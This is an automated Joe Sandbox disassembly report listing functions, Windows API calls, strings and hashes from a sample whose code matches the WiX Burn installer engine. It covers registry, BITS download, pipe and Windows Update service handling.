Instruction Fuzzy Hash: E9519539A01616FBDB11DF59C885FAEBBA8BF00750F1041AEE911AB240C774DE408798

Function 00507F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00508468,00000001,?), ref: 00507F9E
CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00508468,00000001,?), ref: 00507FB9
CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00508468,00000001,?), ref: 00507FD4
CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00508468,00000001,?), ref: 00508040
CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00508468,00000001,?), ref: 00508064
CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00508468,00000001,?), ref: 00508088
CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00508468,00000001,?), ref: 005080A8
lstrlenW.KERNEL32(006C0064,?,00508468,00000001,?), ref: 005080C3

Strings

http://appsyndication.org/2006/appsyn, xrefs: 00507F91
apuputil.cpp, xrefs: 005080DB
algorithm, xrefs: 00508037
sha1, xrefs: 0050807F
msi.dll, xrefs: 00507F98
digest, xrefs: 00507FB0
name, xrefs: 00507FCB
sha256, xrefs: 0050809F
md5, xrefs: 0050805B

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
API String ID: 1657112622-2492263259
Opcode ID: dd56f086e13f456b3bafb2f7ba12cf26a14a7364d8ababa1e7f4bdfa84bfd740
Instruction ID: c01123ff538f853fb8e5a8bac1b811cdce25685e9458d9eb4007fed6f8aea887
Opcode Fuzzy Hash: dd56f086e13f456b3bafb2f7ba12cf26a14a7364d8ababa1e7f4bdfa84bfd740
Instruction Fuzzy Hash: DB51B531A48622BBDB205F54DC9AF2A7E61BF15B30F208715F674AE2D1CBA1EC44D790

Function 004CA03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CA0B6

Strings

Trying per-user extended info for property '%ls' for product: %ls, xrefs: 004CA175
State, xrefs: 004CA098
VersionString, xrefs: 004CA0A6, 004CA131, 004CA147, 004CA15B, 004CA174, 004CA188
Product or related product not found: %ls, xrefs: 004CA1A1
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 004CA148
Failed to get product info., xrefs: 004CA1E3
Failed to change value type., xrefs: 004CA21D
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 004CA24F
Language, xrefs: 004CA09F
Failed to format GUID string., xrefs: 004CA0C1
Unsupported product search type: %u, xrefs: 004CA07E
Failed to set variable., xrefs: 004CA23C
Failed to copy upgrade code., xrefs: 004CA116
AssignmentType, xrefs: 004CA091
Failed to enumerate related products for upgrade code., xrefs: 004CA0F1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: f9e0ae303cb965f9d8ffe796cef65c478f458da3c3e7e62d2160699c36bf0a15
Instruction ID: dbf9671d2b4aefc29c5ddfe5ecff5e3deb88d347fa941e7f4f902301deaa10a3
Opcode Fuzzy Hash: f9e0ae303cb965f9d8ffe796cef65c478f458da3c3e7e62d2160699c36bf0a15
Instruction Fuzzy Hash: 5661C636D4011DBBCB519EA5CD4AFAF7B64FB44318F2401AFF500BA381C63A9E21975A

Function 004D4B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 004D4B84
GetLastError.KERNEL32 ref: 004D4B92
Sleep.KERNEL32(00000064), ref: 004D4BB6

Strings

\\.\pipe\%ls, xrefs: 004D4B3C
Failed to open companion process with PID: %u, xrefs: 004D4CDE
Failed to allocate name of parent cache pipe., xrefs: 004D4C2B
Failed to allocate name of parent pipe., xrefs: 004D4B50
pipe.cpp, xrefs: 004D4BCF, 004D4CD2
Failed to open parent pipe: %ls, xrefs: 004D4BDC
Failed to verify parent pipe: %ls, xrefs: 004D4BFE
\\.\pipe\%ls.Cache, xrefs: 004D4C17
feclient.dll, xrefs: 004D4BE9, 004D4C84, 004D4C98, 004D4CDC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateErrorFileLastSleep
String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
API String ID: 408151869-3212458075
Opcode ID: dcc0efe9328a3b0a07dd6b945b309db90efe602adb5a9cc217052eca08090ed5
Instruction ID: 206e7f10df576a82ee0ede7fcdaf591f3b689b9acd8c8cc881fda2a80876fb4c
Opcode Fuzzy Hash: dcc0efe9328a3b0a07dd6b945b309db90efe602adb5a9cc217052eca08090ed5
Instruction Fuzzy Hash: 14412B36D91632BBE73156A08D56F5E7954BF50B20F120227FE00BB3D0D779AE0099D9

Function 004E69D2 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 153serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,004E6F28,?), ref: 004E6A0B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004E6F28,?,?,?), ref: 004E6A18
OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,004E6F28,?,?,?), ref: 004E6A60
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004E6F28,?,?,?), ref: 004E6A6C
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004E6F28,?,?,?), ref: 004E6AA6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004E6F28,?,?,?), ref: 004E6AB0
CloseServiceHandle.ADVAPI32(00000000), ref: 004E6B67
CloseServiceHandle.ADVAPI32(?), ref: 004E6B71

Strings

(oN, xrefs: 004E69F3
Failed to query status of WU service., xrefs: 004E6ADE
Failed to read configuration for WU service., xrefs: 004E6B17
Failed to open WU service., xrefs: 004E6A9A
Failed to open service control manager., xrefs: 004E6A46
wuauserv, xrefs: 004E6A5A
Failed to mark WU service to start on demand., xrefs: 004E6B38
msuengine.cpp, xrefs: 004E6A3C, 004E6A90, 004E6AD4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
String ID: (oN$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
API String ID: 971853308-810903730
Opcode ID: 1331dfad0cf56ad6215658d971d1fed51679d3df36f8228b2fef86cfaad9bb77
Instruction ID: ff460e6ddaa4f591e8c5891aef507abbe74e40e83e3e99b36157c0addb1af18a
Opcode Fuzzy Hash: 1331dfad0cf56ad6215658d971d1fed51679d3df36f8228b2fef86cfaad9bb77
Instruction Fuzzy Hash: F541C776E402759BD720DBA68C85EAFBBA4AF65751F028426FD01F7341D778DC0086A4

Function 004CF585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,004D04DF,InstallerVersion,InstallerVersion,00000000,004D04DF,InstallerName,InstallerName,00000000,004D04DF,Date,InstalledDate,00000000,004D04DF,LogonUser), ref: 004CF733

Part of subcall function 005014F4: RegSetValueExW.ADVAPI32(00020006,00510D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,004CF335,00000000,?,00020006), ref: 00501527

Strings

Publisher, xrefs: 004CF63F, 004CF652
ThisVersionInstalled, xrefs: 004CF5DF, 004CF5F2
LogonUser, xrefs: 004CF6A9
ReleaseType, xrefs: 004CF68A, 004CF68F, 004CF69E
InstalledDate, xrefs: 004CF6C4, 004CF6DD
PackageVersion, xrefs: 004CF61F, 004CF632
InstallerVersion, xrefs: 004CF701, 004CF706, 004CF707, 004CF717
PublishingGroup, xrefs: 004CF667, 004CF67A
Failed to get the formatted key path for update registration., xrefs: 004CF5A7
InstalledBy, xrefs: 004CF6A4, 004CF6BD
InstallerName, xrefs: 004CF6E4, 004CF6E9, 004CF6EA, 004CF6FA
Date, xrefs: 004CF6C9
Failed to write %ls value., xrefs: 004CF71C
PackageName, xrefs: 004CF5FF, 004CF612
Failed to create the key for update registration., xrefs: 004CF5D3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
API String ID: 3132538880-2703781546
Opcode ID: 1b6e36057de7971eeec030671ec9de4a406fa79d104ec77c0e097b4907e2d692
Instruction ID: 77f55b50b1a4f35fc7ac7950e7a66d76ede1453152b9d048cd10f3068214eb23
Opcode Fuzzy Hash: 1b6e36057de7971eeec030671ec9de4a406fa79d104ec77c0e097b4907e2d692
Instruction Fuzzy Hash: 33412839A81665B7DF229750CC06FEF7E26BB10B10F11017AF900B62A2C77C8E65D68D

Function 004DE7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 004DE7FF
RegisterClassW.USER32(?), ref: 004DE82B
GetLastError.KERNEL32 ref: 004DE836
CreateWindowExW.USER32(00000080,00519E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 004DE89D
GetLastError.KERNEL32 ref: 004DE8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 004DE945

Strings

Unexpected return value from message pump., xrefs: 004DE930
Failed to register window., xrefs: 004DE864
Failed to create window., xrefs: 004DE8D5
WixBurnMessageWindow, xrefs: 004DE824, 004DE940
uithread.cpp, xrefs: 004DE85A, 004DE8CB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 3e20cfa852a98df827dbf5d0ff4a85752b69fcd810356cad95162496a7a03e7c
Instruction ID: 24332f2a92391523434657224cf96fb8fbee07b7bc36356d24f059ce83fba1e3
Opcode Fuzzy Hash: 3e20cfa852a98df827dbf5d0ff4a85752b69fcd810356cad95162496a7a03e7c
Instruction Fuzzy Hash: 5741E772900215ABEB20ABA2DC98ADFBFB8FF04710F204167F904AB350D7359945DBA5

Function 004EC774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON

Download Yara Rule

Strings

Failed to copy filename for passthrough pseudo bundle., xrefs: 004EC9BE
Failed to allocate memory for pseudo bundle payload hash., xrefs: 004EC9AD
Failed to recreate command-line arguments., xrefs: 004ECA43
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 004ECAAC
Failed to copy related arguments for passthrough bundle package, xrefs: 004ECA82
Failed to copy key for passthrough pseudo bundle., xrefs: 004EC988
Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 004EC7B4
Failed to copy local source path for passthrough pseudo bundle., xrefs: 004EC9B7
Failed to copy download source for passthrough pseudo bundle., xrefs: 004EC98F
pseudobundle.cpp, xrefs: 004EC7A8, 004EC9A1, 004EC9DB
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 004EC9E7
Failed to copy cache id for passthrough pseudo bundle., xrefs: 004ECA05
Failed to copy install arguments for passthrough bundle package, xrefs: 004ECA62
Failed to copy key for passthrough pseudo bundle payload., xrefs: 004EC9C5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1357844191-115096447
Opcode ID: 8eb90f6e4a41d19ccf6c6bff33c704b39438d721097802dee771b5a9c6aa18fa
Instruction ID: c3dfc5853df9591db9f8968b5d3f5c0425aa299c525e44ba25ee73a740dff1a8
Opcode Fuzzy Hash: 8eb90f6e4a41d19ccf6c6bff33c704b39438d721097802dee771b5a9c6aa18fa
Instruction Fuzzy Hash: 9CB1AC75A00656EFDB51DF25C881F56BBA1BF08311F1081AAFD049F352CB75E822DB84

Function 004EDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 004EDE61

Strings

bitsengine.cpp, xrefs: 004EDE77, 004EDF6A
Failed while waiting for BITS download., xrefs: 004EE012
Failed to initialize BITS job callback., xrefs: 004EDF82
Failed to complete BITS job., xrefs: 004EE00B
Failed to add file to BITS job., xrefs: 004EDF2E
Falied to start BITS job., xrefs: 004EE019
Failed to set callback interface for BITS job., xrefs: 004EDF99
Failed to set credentials for BITS job., xrefs: 004EDF0F
Invalid BITS engine URL: %ls, xrefs: 004EDE83
Failed to create BITS job callback., xrefs: 004EDF74
Failed to download BITS job., xrefs: 004EDFF8
Failed to copy download URL., xrefs: 004EDEA8
Failed to create BITS job., xrefs: 004EDEF0

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
API String ID: 1659193697-2382896028
Opcode ID: b16d94558d704992eb40a47beed5d7d8fea38103ed3fb7b3ee16e12a2789afd1
Instruction ID: c36503f140f42356e65dd7c80a612ac90f88e0805efe1013ac57c0138f0b9d8e
Opcode Fuzzy Hash: b16d94558d704992eb40a47beed5d7d8fea38103ed3fb7b3ee16e12a2789afd1
Instruction Fuzzy Hash: 77612531E01271EBCB219F96C884E6E7FA4AF09722B114157FC04AF391D7B9DD019B88

Function 004CBC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CBCE5
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 004CBDF2
GetLastError.KERNEL32(?,?,?,?), ref: 004CBDFC
WaitForInputIdle.USER32(?,?), ref: 004CBE50
CloseHandle.KERNEL32(?,?,?), ref: 004CBE9B
CloseHandle.KERNEL32(?,?,?), ref: 004CBEA8

Strings

approvedexe.cpp, xrefs: 004CBE20
"%ls", xrefs: 004CBD62, 004CBD7C
D, xrefs: 004CBDD1
"%ls" %s, xrefs: 004CBD0B, 004CBD4C
Failed to format argument string., xrefs: 004CBCF0
Failed to CreateProcess on path: %ls, xrefs: 004CBE2D
Failed to create executable command., xrefs: 004CBD1F
Failed to create obfuscated executable command., xrefs: 004CBD90
Failed to format obfuscated argument string., xrefs: 004CBD3C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: 401d5cb4decdeecd2ccd4a2f077ee5214842e0f2a55e25e94e78ae7df9991860
Instruction ID: 8d833e49d7c15b4df380bffce420379015c5696feee88cc833d3285cda1b94d7
Opcode Fuzzy Hash: 401d5cb4decdeecd2ccd4a2f077ee5214842e0f2a55e25e94e78ae7df9991860
Instruction Fuzzy Hash: 00518E7AC0061ABBCF619F91CC42EEEBB78FF04710F10456EEA05B2251D7355E109B95

Function 004D3B4E Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 004D3BA2
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 004D3BAC
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 004D3C15
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 004D3C1C
CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 004D3CA6

Strings

4Wu, xrefs: 004D3BA2
logging.cpp, xrefs: 004D3BD0
Failed to get length of temp folder., xrefs: 004D3C06
Failed to get length of session id string., xrefs: 004D3C71
Failed to get temp folder., xrefs: 004D3BDA
%u\, xrefs: 004D3C36
Failed to copy temp folder., xrefs: 004D3CCF
crypt32.dll, xrefs: 004D3B61
Failed to format session id as a string., xrefs: 004D3C4A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
String ID: 4Wu$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 2407829081-99372373
Opcode ID: a862376cff8dc8d2b3a9a60017b8613e490daab15cb73985299324aa7f90e10e
Instruction ID: 0dd110b0451d85f9428c0063793e9d6721ff3689defb83f72670cd1e76a0ab3c
Opcode Fuzzy Hash: a862376cff8dc8d2b3a9a60017b8613e490daab15cb73985299324aa7f90e10e
Instruction Fuzzy Hash: 0841C272D8123DABDB209B508C59FDA7B78AB10B11F100197F908B7381EA789F858BD5

Function 004CA28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CA2B3
_MREFOpen@16.MSPDB140-MSVCRT ref: 004CA30E
RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 004CA32F
RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 004CA405

Strings

Failed to open registry key. Key = '%ls', xrefs: 004CA3C7
Registry key not found. Key = '%ls', xrefs: 004CA396
Failed to format value string., xrefs: 004CA319
Failed to set variable., xrefs: 004CA3BD
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 004CA3DD
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 004CA37A
search.cpp, xrefs: 004CA360
Failed to format key string., xrefs: 004CA2BE
Failed to query registry key value., xrefs: 004CA36A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: 8a26e855b0be6918d532b8f6f2af089524fa6bf4c8e98fa77433f5ad4aa5329d
Instruction ID: 3a0181fa4f41b6b5fdfb2ab33250c2d3dfe74c5055241b8bb67ee9fa8c6c5f0a
Opcode Fuzzy Hash: 8a26e855b0be6918d532b8f6f2af089524fa6bf4c8e98fa77433f5ad4aa5329d
Instruction Fuzzy Hash: 2141F83AD40129BBDB515A94CC0AFAFBF64FF44714F10426AFC04B61E2D3759E20A79A

Function 004CB208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,004CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB210
GetLastError.KERNEL32(?,004CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 004CB21C

Strings

Bundle guid didn't match the guid in the PE Header in memory., xrefs: 004CB39B
.wixburn, xrefs: 004CB2BE
section.cpp, xrefs: 004CB240, 004CB271, 004CB29C, 004CB305, 004CB326, 004CB34F, 004CB38F
.wix, xrefs: 004CB2E3
Failed to read section info, unsupported version: %08x, xrefs: 004CB35E
Failed to find Burn section., xrefs: 004CB332
Failed to find valid DOS image header in buffer., xrefs: 004CB27D
Failed to read section info, data to short: %u, xrefs: 004CB314
burn, xrefs: 004CB2EB
Failed to find valid NT image header in buffer., xrefs: 004CB2A8
Failed to get module handle to process., xrefs: 004CB24A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 4242514867-926796631
Opcode ID: 92b166c3b5f365fc2843a1063ba94fcf918336acd7de6d643fb675a2e4a4a83c
